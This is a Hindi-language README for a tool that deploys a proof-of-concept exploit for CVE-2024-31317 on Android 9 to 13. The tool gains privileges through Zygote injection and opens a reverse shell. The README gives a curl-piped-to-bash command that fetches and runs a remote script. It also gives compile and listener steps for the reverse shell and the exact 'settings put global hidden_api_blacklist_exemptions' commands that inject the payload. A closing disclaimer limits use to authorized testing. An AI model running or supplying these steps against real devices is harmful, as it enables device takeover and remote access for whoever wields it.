
CVE-2024-31317 PoC के लिए स्वचालित तैनाती उपकरण, Android 9-13 पर, जो Zygote इंजेक्शन और रिवर्स शेल निष्पादन के माध्यम से विशेषाधिकार वृद्धि को सक्षम करता है।
Android 9 से 13 तक के उपकरणों को लक्षित करने वाले CVE-2024-31317 प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट के लिए एक परिनियोजन उपकरण।
CVE-2024-31317-PoC-Deployer एक स्वचालित परिनियोजन स्क्रिप्ट है, जो CVE-2024-31317 भेद्यता शोषण के लिए आवश्यक सभी फ़ाइलों को शीघ्रता से उत्पन्न और कॉन्फ़िगर करने के लिए उपयोग की जाती है। यह भेद्यता Android 9 से 13 के उपकरणों को प्रभावित करती है, जो Zygote प्रक्रिया के माध्यम से विशेषाधिकार वृद्धि और मनमाने कोड के निष्पादन की अनुमति देती है।
reverse_shell.c - C भाषा में लिखा गया रिवर्स शेल प्रोग्रामpayload.txt - विशेष रूप से निर्मित शोषण पेलोडcompile.sh - स्वचालित संकलन स्क्रिप्टREADME.txt - विस्तृत उपयोग निर्देशCVE-2024-31317.txt - भेद्यता तकनीकी विश्लेषण दस्तावेज़दूरस्थ परिनियोजन स्क्रिप्ट चलाएँ:
pkg install -y curl ; bash -c "$(curl -L https://ghfast.top/https://github.com/Webldix/CVE-2024-31317-PoC-Deployer/blob/main/Android_Zygote_Research_Kit.sh)"
रिवर्स शेल संकलित करें:
sh compile.sh
रिवर्स शेल श्रोता चलाएँ:
sh reverse_shell
payload.txt को लक्ष्य उपकरण के /data/local/tmp/ पर अपलोड करेंxxx.xxx.xxx को अपने श्रोता सर्वर IP से बदलेंam force-stop com.android.settings
cd /data/local/tmp/
settings put global hidden_api_blacklist_exemptions "$(cat payload.txt)"
am start -n com.android.settings/.Settings
settings put global hidden_api_blacklist_exemptions "null"
यह उपकरण केवल वैध सुरक्षा परीक्षण और शोध उद्देश्यों के लिए है। उपयोग से पहले लक्ष्य प्रणाली से स्पष्ट प्राधिकरण प्राप्त करना अनिवार्य है। अनधिकृत उपयोग कानून का उल्लंघन हो सकता है। डेवलपर किसी भी दुरुपयोग के लिए उत्तरदायी नहीं है।
यह परियोजना MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।